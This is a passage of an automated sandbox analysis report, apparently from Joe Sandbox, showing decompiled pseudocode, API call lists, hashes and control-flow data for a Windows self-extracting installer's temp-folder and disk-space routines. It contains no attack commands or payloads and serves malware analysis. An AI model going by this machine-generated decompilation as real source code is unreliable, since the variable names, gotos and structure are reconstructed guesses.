                                                                                                                                                                                                                                                								E000244B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                								goto L2;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t101 = 0x4b1;
                                                                                                                                                                                                                                                						E000244B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						LocalFree(_t109);
                                                                                                                                                                                                                                                						 *0x29124 = 0x80070714;
                                                                                                                                                                                                                                                						goto L2;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t101 = 0x4b5;
                                                                                                                                                                                                                                                					E000244B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					 *0x29124 = E00026285();
                                                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                                                					_t38 = 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				L47:
                                                                                                                                                                                                                                                				return E00026CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                                0x000256b9
                                                                                                                                                                                                                                                0x000256bf
                                                                                                                                                                                                                                                0x000256c1
                                                                                                                                                                                                                                                0x000256f3
                                                                                                                                                                                                                                                0x000256f3
                                                                                                                                                                                                                                                0x00025705
                                                                                                                                                                                                                                                0x0002570a
                                                                                                                                                                                                                                                0x00025711
                                                                                                                                                                                                                                                0x00025717
                                                                                                                                                                                                                                                0x00025724
                                                                                                                                                                                                                                                0x00025726
                                                                                                                                                                                                                                                0x00025729
                                                                                                                                                                                                                                                0x00025730
                                                                                                                                                                                                                                                0x00025737
                                                                                                                                                                                                                                                0x0002573d
                                                                                                                                                                                                                                                0x00025740
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002572b
                                                                                                                                                                                                                                                0x0002572b
                                                                                                                                                                                                                                                0x0002572e
                                                                                                                                                                                                                                                0x00025742
                                                                                                                                                                                                                                                0x00025742
                                                                                                                                                                                                                                                0x00025745
                                                                                                                                                                                                                                                0x0002576b
                                                                                                                                                                                                                                                0x0002576b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025747
                                                                                                                                                                                                                                                0x00025747
                                                                                                                                                                                                                                                0x0002574d
                                                                                                                                                                                                                                                0x0002574f
                                                                                                                                                                                                                                                0x00025771
                                                                                                                                                                                                                                                0x00025771
                                                                                                                                                                                                                                                0x00025773
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025751
                                                                                                                                                                                                                                                0x00025751
                                                                                                                                                                                                                                                0x00025753
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025755
                                                                                                                                                                                                                                                0x0002575b
                                                                                                                                                                                                                                                0x00025760
                                                                                                                                                                                                                                                0x00025762
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025764
                                                                                                                                                                                                                                                0x00025764
                                                                                                                                                                                                                                                0x00025769
                                                                                                                                                                                                                                                0x0002577e
                                                                                                                                                                                                                                                0x0002577e
                                                                                                                                                                                                                                                0x00025781
                                                                                                                                                                                                                                                0x00025788
                                                                                                                                                                                                                                                0x0002578d
                                                                                                                                                                                                                                                0x0002578f
                                                                                                                                                                                                                                                0x000257b2
                                                                                                                                                                                                                                                0x000257b8
                                                                                                                                                                                                                                                0x000257bd
                                                                                                                                                                                                                                                0x000257bf
                                                                                                                                                                                                                                                0x000257cd
                                                                                                                                                                                                                                                0x000257cd
                                                                                                                                                                                                                                                0x000257dd
                                                                                                                                                                                                                                                0x000257e3
                                                                                                                                                                                                                                                0x000257ef
                                                                                                                                                                                                                                                0x000257f5
                                                                                                                                                                                                                                                0x000257f8
                                                                                                                                                                                                                                                0x0002580a
                                                                                                                                                                                                                                                0x0002580a
                                                                                                                                                                                                                                                0x000257fa
                                                                                                                                                                                                                                                0x00025802
                                                                                                                                                                                                                                                0x00025802
                                                                                                                                                                                                                                                0x0002580d
                                                                                                                                                                                                                                                0x0002580f
                                                                                                                                                                                                                                                0x00025830
                                                                                                                                                                                                                                                0x00025836
                                                                                                                                                                                                                                                0x0002583d
                                                                                                                                                                                                                                                0x0002584b
                                                                                                                                                                                                                                                0x00025851
                                                                                                                                                                                                                                                0x00025855
                                                                                                                                                                                                                                                0x0002585a
                                                                                                                                                                                                                                                0x0002585c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002585e
                                                                                                                                                                                                                                                0x0002585e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002585e
                                                                                                                                                                                                                                                0x00025811
                                                                                                                                                                                                                                                0x00025817
                                                                                                                                                                                                                                                0x00025819
                                                                                                                                                                                                                                                0x0002581f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002581f
                                                                                                                                                                                                                                                0x00025791
                                                                                                                                                                                                                                                0x00025797
                                                                                                                                                                                                                                                0x0002579c
                                                                                                                                                                                                                                                0x0002579e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000257a0
                                                                                                                                                                                                                                                0x000257a9
                                                                                                                                                                                                                                                0x000257ae
                                                                                                                                                                                                                                                0x000257b0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000257b0
                                                                                                                                                                                                                                                0x0002579e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025769
                                                                                                                                                                                                                                                0x00025762

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246A0
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: SizeofResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246A9
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246C3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LoadResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246CC
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: LockResource.KERNEL32(00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246D3
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: memcpy_s.MSVCRT ref: 000246E5
                                                                                                                                                                                                                                                  • Part of subcall function 0002468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000246EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 000255CF
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00025638
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 0002564C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00025620
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
                                                                                                                                                                                                                                                  • Part of subcall function 000244B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
                                                                                                                                                                                                                                                  • Part of subcall function 00026285: GetLastError.KERNEL32(00025BBC), ref: 00026285
                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 000256B9
                                                                                                                                                                                                                                                • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0002571E
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00025737
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 000257CD
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 000257EF
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00025802
                                                                                                                                                                                                                                                  • Part of subcall function 00022630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00022654
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00025830
                                                                                                                                                                                                                                                  • Part of subcall function 00026517: FindResourceA.KERNEL32(00020000,000007D6,00000005), ref: 0002652A
                                                                                                                                                                                                                                                  • Part of subcall function 00026517: LoadResource.KERNEL32(00020000,00000000,?,?,00022EE8,00000000,000219E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00026538
                                                                                                                                                                                                                                                  • Part of subcall function 00026517: DialogBoxIndirectParamA.USER32(00020000,00000000,00000547,000219E0,00000000), ref: 00026557
                                                                                                                                                                                                                                                  • Part of subcall function 00026517: FreeResource.KERNEL32(00000000,?,?,00022EE8,00000000,000219E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00026560
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00025878
                                                                                                                                                                                                                                                  • Part of subcall function 0002597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000259A8
                                                                                                                                                                                                                                                  • Part of subcall function 0002597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 000259AF
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                                • API String ID: 2436801531-337015389
                                                                                                                                                                                                                                                • Opcode ID: 249ab86c6c28da75ca63c44383e9212d914c7f9d306955ce8e752524b2f2de01
                                                                                                                                                                                                                                                • Instruction ID: 0fb99a8bf4f4f0f032c473d633a33e328eb647287c385484e538f257ddcffe43
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 249ab86c6c28da75ca63c44383e9212d914c7f9d306955ce8e752524b2f2de01
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68814070B04A345BEB70AB74BC85BFE72AD9F65301F1400A5F586E3191DFB48DC28A59
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 324 2597d-259b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 259bb-259d8 call 244b9 call 26285 324->325 326 259dd-25a1b GetDiskFreeSpaceA 324->326 343 25c05-25c14 call 26ce0 325->343 328 25ba1-25bde memset call 26285 GetLastError FormatMessageA 326->328 329 25a21-25a4a MulDiv 326->329 338 25be3-25bfc call 244b9 SetCurrentDirectoryA 328->338 329->328 332 25a50-25a6c GetVolumeInformationA 329->332 335 25ab5-25aca SetCurrentDirectoryA 332->335 336 25a6e-25ab0 memset call 26285 GetLastError FormatMessageA 332->336 340 25acc-25ad1 335->340 336->338 353 25c02 338->353 341 25ae2-25ae4 340->341 342 25ad3-25ad8 340->342 348 25ae6 341->348 349 25ae7-25af8 341->349 342->341 346 25ada-25ae0 342->346 346->340 346->341 348->349 352 25af9-25afb 349->352 355 25b05-25b08 352->355 356 25afd-25b03 352->356 354 25c04 353->354 354->343 357 25b20-25b27 355->357 358 25b0a-25b1b call 244b9 355->358 356->352 356->355 360 25b52-25b5b 357->360 361 25b29-25b33 357->361 358->353 364 25b62-25b6d 360->364 361->360 363 25b35-25b50 361->363 363->364 365 25b76-25b7d 364->365 366 25b6f-25b74 364->366 368 25b83 365->368 369 25b7f-25b81 365->369 367 25b85 366->367 370 25b96-25b9f 367->370 371 25b87-25b94 call 2268b 367->371 368->367 369->367 370->354 371->354
                                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                                			E0002597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                                				char _v276;
                                                                                                                                                                                                                                                				char _v788;
                                                                                                                                                                                                                                                				long _v792;
                                                                                                                                                                                                                                                				long _v796;
                                                                                                                                                                                                                                                				long _v800;
                                                                                                                                                                                                                                                				signed int _v804;
                                                                                                                                                                                                                                                				long _v808;
                                                                                                                                                                                                                                                				int _v812;
                                                                                                                                                                                                                                                				long _v816;
                                                                                                                                                                                                                                                				long _v820;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t46;
                                                                                                                                                                                                                                                				int _t50;
                                                                                                                                                                                                                                                				signed int _t55;
                                                                                                                                                                                                                                                				void* _t66;
                                                                                                                                                                                                                                                				int _t69;
                                                                                                                                                                                                                                                				signed int _t73;
                                                                                                                                                                                                                                                				signed short _t78;
                                                                                                                                                                                                                                                				signed int _t87;
                                                                                                                                                                                                                                                				signed int _t101;
                                                                                                                                                                                                                                                				int _t102;
                                                                                                                                                                                                                                                				unsigned int _t103;
                                                                                                                                                                                                                                                				unsigned int _t105;
                                                                                                                                                                                                                                                				signed int _t111;
                                                                                                                                                                                                                                                				long _t112;
                                                                                                                                                                                                                                                				signed int _t116;
                                                                                                                                                                                                                                                				CHAR* _t118;
                                                                                                                                                                                                                                                				signed int _t119;
                                                                                                                                                                                                                                                				signed int _t120;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t114 = __edi;
                                                                                                                                                                                                                                                				_t46 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t46 ^ _t120;
                                                                                                                                                                                                                                                				_v804 = __edx;
                                                                                                                                                                                                                                                				_t118 = __ecx;
                                                                                                                                                                                                                                                				GetCurrentDirectoryA(0x104,  &_v276);
                                                                                                                                                                                                                                                				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                                                                                                                                                                                                				if(_t50 != 0) {
                                                                                                                                                                                                                                                					_push(__edi);
                                                                                                                                                                                                                                                					_v796 = 0;
                                                                                                                                                                                                                                                					_v792 = 0;
                                                                                                                                                                                                                                                					_v800 = 0;
                                                                                                                                                                                                                                                					_v808 = 0;
                                                                                                                                                                                                                                                					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                                                                                                                                                                                                					__eflags = _t55;
                                                                                                                                                                                                                                                					if(_t55 == 0) {
                                                                                                                                                                                                                                                						L29:
                                                                                                                                                                                                                                                						memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                                						 *0x29124 = E00026285();
                                                                                                                                                                                                                                                						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                                						_t110 = 0x4b0;
                                                                                                                                                                                                                                                						L30:
                                                                                                                                                                                                                                                						__eflags = 0;
                                                                                                                                                                                                                                                						E000244B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                                                                                                                                                                                                						SetCurrentDirectoryA( &_v276);
                                                                                                                                                                                                                                                						L31:
                                                                                                                                                                                                                                                						_t66 = 0;
                                                                                                                                                                                                                                                						__eflags = 0;
                                                                                                                                                                                                                                                						L32:
                                                                                                                                                                                                                                                						_pop(_t114);
                                                                                                                                                                                                                                                						goto L33;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t69 = _v792 * _v796;
                                                                                                                                                                                                                                                					_v812 = _t69;
                                                                                                                                                                                                                                                					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                                                                                                                                                                                                					__eflags = _t116;
                                                                                                                                                                                                                                                					if(_t116 == 0) {
                                                                                                                                                                                                                                                						goto L29;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                                                                                                                                                                                                					__eflags = _t73;
                                                                                                                                                                                                                                                					if(_t73 != 0) {
                                                                                                                                                                                                                                                						SetCurrentDirectoryA( &_v276); // executed
                                                                                                                                                                                                                                                						_t101 =  &_v16;
                                                                                                                                                                                                                                                						_t111 = 6;
                                                                                                                                                                                                                                                						_t119 = _t118 - _t101;
                                                                                                                                                                                                                                                						__eflags = _t119;
                                                                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                                                                							_t22 = _t111 - 4; // 0x2
                                                                                                                                                                                                                                                							__eflags = _t22;
                                                                                                                                                                                                                                                							if(_t22 == 0) {
                                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                                                                                                                                                                                                							__eflags = _t87;
                                                                                                                                                                                                                                                							if(_t87 == 0) {
                                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							 *_t101 = _t87;
                                                                                                                                                                                                                                                							_t101 = _t101 + 1;
                                                                                                                                                                                                                                                							_t111 = _t111 - 1;
                                                                                                                                                                                                                                                							__eflags = _t111;
                                                                                                                                                                                                                                                							if(_t111 != 0) {
                                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						__eflags = _t111;
                                                                                                                                                                                                                                                						if(_t111 == 0) {
                                                                                                                                                                                                                                                							_t101 = _t101 - 1;
                                                                                                                                                                                                                                                							__eflags = _t101;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						 *_t101 = 0;
                                                                                                                                                                                                                                                						_t112 = 0x200;
                                                                                                                                                                                                                                                						_t102 = _v812;
                                                                                                                                                                                                                                                						_t78 = 0;
                                                                                                                                                                                                                                                						_t118 = 8;
                                                                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                                                                							__eflags = _t102 - _t112;
                                                                                                                                                                                                                                                							if(_t102 == _t112) {
                                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t112 = _t112 + _t112;
                                                                                                                                                                                                                                                							_t78 = _t78 + 1;
                                                                                                                                                                                                                                                							__eflags = _t78 - _t118;
                                                                                                                                                                                                                                                							if(_t78 < _t118) {
                                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						__eflags = _t78 - _t118;
                                                                                                                                                                                                                                                						if(_t78 != _t118) {
                                                                                                                                                                                                                                                							__eflags =  *0x29a34 & 0x00000008;
                                                                                                                                                                                                                                                							if(( *0x29a34 & 0x00000008) == 0) {
                                                                                                                                                                                                                                                								L20:
                                                                                                                                                                                                                                                								_t103 =  *0x29a38; // 0x0
                                                                                                                                                                                                                                                								_t110 =  *((intOrPtr*)(0x289e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                                								L21:
                                                                                                                                                                                                                                                								__eflags = (_v804 & 0x00000003) - 3;
                                                                                                                                                                                                                                                								if((_v804 & 0x00000003) != 3) {
                                                                                                                                                                                                                                                									__eflags = _v804 & 0x00000001;
                                                                                                                                                                                                                                                									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                										__eflags = _t103 - _t116;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										__eflags = _t110 - _t116;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								if(__eflags <= 0) {
                                                                                                                                                                                                                                                									 *0x29124 = 0;
                                                                                                                                                                                                                                                									_t66 = 1;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t66 = E0002268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								goto L32;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                                                                							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                                                                								goto L20;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t105 =  *0x29a38; // 0x0
                                                                                                                                                                                                                                                							_t110 =  *((intOrPtr*)(0x289e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x289e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                                                                							_t103 = (_t105 >> 2) +  *0x29a38;
                                                                                                                                                                                                                                                							goto L21;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t110 = 0x4c5;
                                                                                                                                                                                                                                                						E000244B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						goto L31;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                                					 *0x29124 = E00026285();
                                                                                                                                                                                                                                                					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                                					_t110 = 0x4f9;
                                                                                                                                                                                                                                                					goto L30;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t110 = 0x4bc;
                                                                                                                                                                                                                                                					E000244B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					 *0x29124 = E00026285();
                                                                                                                                                                                                                                                					_t66 = 0;
                                                                                                                                                                                                                                                					L33:
                                                                                                                                                                                                                                                					return E00026CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}



































                                                                                                                                                                                                                                                0x00025ad1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025ad3
                                                                                                                                                                                                                                                0x00025ad6
                                                                                                                                                                                                                                                0x00025ad8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025ada
                                                                                                                                                                                                                                                0x00025adc
                                                                                                                                                                                                                                                0x00025add
                                                                                                                                                                                                                                                0x00025add
                                                                                                                                                                                                                                                0x00025ae0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025ae0
                                                                                                                                                                                                                                                0x00025ae2
                                                                                                                                                                                                                                                0x00025ae4
                                                                                                                                                                                                                                                0x00025ae6
                                                                                                                                                                                                                                                0x00025ae6
                                                                                                                                                                                                                                                0x00025ae6
                                                                                                                                                                                                                                                0x00025ae9
                                                                                                                                                                                                                                                0x00025aeb
                                                                                                                                                                                                                                                0x00025af0
                                                                                                                                                                                                                                                0x00025af6
                                                                                                                                                                                                                                                0x00025af8
                                                                                                                                                                                                                                                0x00025af9
                                                                                                                                                                                                                                                0x00025af9
                                                                                                                                                                                                                                                0x00025afb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025afd
                                                                                                                                                                                                                                                0x00025aff
                                                                                                                                                                                                                                                0x00025b00
                                                                                                                                                                                                                                                0x00025b03
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025b03
                                                                                                                                                                                                                                                0x00025b05
                                                                                                                                                                                                                                                0x00025b08
                                                                                                                                                                                                                                                0x00025b20
                                                                                                                                                                                                                                                0x00025b27
                                                                                                                                                                                                                                                0x00025b52
                                                                                                                                                                                                                                                0x00025b52
                                                                                                                                                                                                                                                0x00025b5b
                                                                                                                                                                                                                                                0x00025b62
                                                                                                                                                                                                                                                0x00025b6b
                                                                                                                                                                                                                                                0x00025b6d
                                                                                                                                                                                                                                                0x00025b76
                                                                                                                                                                                                                                                0x00025b7d
                                                                                                                                                                                                                                                0x00025b83
                                                                                                                                                                                                                                                0x00025b7f
                                                                                                                                                                                                                                                0x00025b7f
                                                                                                                                                                                                                                                0x00025b7f
                                                                                                                                                                                                                                                0x00025b6f
                                                                                                                                                                                                                                                0x00025b72
                                                                                                                                                                                                                                                0x00025b72
                                                                                                                                                                                                                                                0x00025b85
                                                                                                                                                                                                                                                0x00025b98
                                                                                                                                                                                                                                                0x00025b9e
                                                                                                                                                                                                                                                0x00025b87
                                                                                                                                                                                                                                                0x00025b8f
                                                                                                                                                                                                                                                0x00025b8f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025b85
                                                                                                                                                                                                                                                0x00025b29
                                                                                                                                                                                                                                                0x00025b33
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025b35
                                                                                                                                                                                                                                                0x00025b48
                                                                                                                                                                                                                                                0x00025b4a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025b4a
                                                                                                                                                                                                                                                0x00025b0f
                                                                                                                                                                                                                                                0x00025b16
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025b16
                                                                                                                                                                                                                                                0x00025a7c
                                                                                                                                                                                                                                                0x00025a8a
                                                                                                                                                                                                                                                0x00025aa5
                                                                                                                                                                                                                                                0x00025aab
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000259bb
                                                                                                                                                                                                                                                0x000259c0
                                                                                                                                                                                                                                                0x000259c7
                                                                                                                                                                                                                                                0x000259d1
                                                                                                                                                                                                                                                0x000259d6
                                                                                                                                                                                                                                                0x00025c05
                                                                                                                                                                                                                                                0x00025c14
                                                                                                                                                                                                                                                0x00025c14

APIs
• GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000259A8
• SetCurrentDirectoryA.KERNELBASE(?), ref: 000259AF
• GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00025A13
• MulDiv.KERNEL32(?,?,00000400), ref: 00025A40
• GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00025A64
• memset.MSVCRT ref: 00025A7C
• GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00025A98
• FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00025AA5
• SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00025BFC
  • Part of subcall function 000244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
  • Part of subcall function 000244B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
  • Part of subcall function 00026285: GetLastError.KERNEL32(00025BBC), ref: 00026285
Memory Dump Source
• Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
Similarity
• API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
• String ID:
• API String ID: 4237285672-0
• Opcode ID: d78561aac4116e1ae68b99426f51e99db5b291ac7e18e6de077204d16dcaf14c
• Instruction ID: 80e7bf3ff4d892e1ddfcb8ccb540955f0f5ba9b08bf9842e75ffa49e5135070c
• Opcode Fuzzy Hash: d78561aac4116e1ae68b99426f51e99db5b291ac7e18e6de077204d16dcaf14c
• Instruction Fuzzy Hash: 1571B5B1A0022CAFEB26DF60EC85FFB77ADEB48305F5440A9F405D2141EB349E858B65
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

Control-flow Graph

[Figure: control-flow graph of the function starting at 24fe0; legend: Executed / Not Executed]
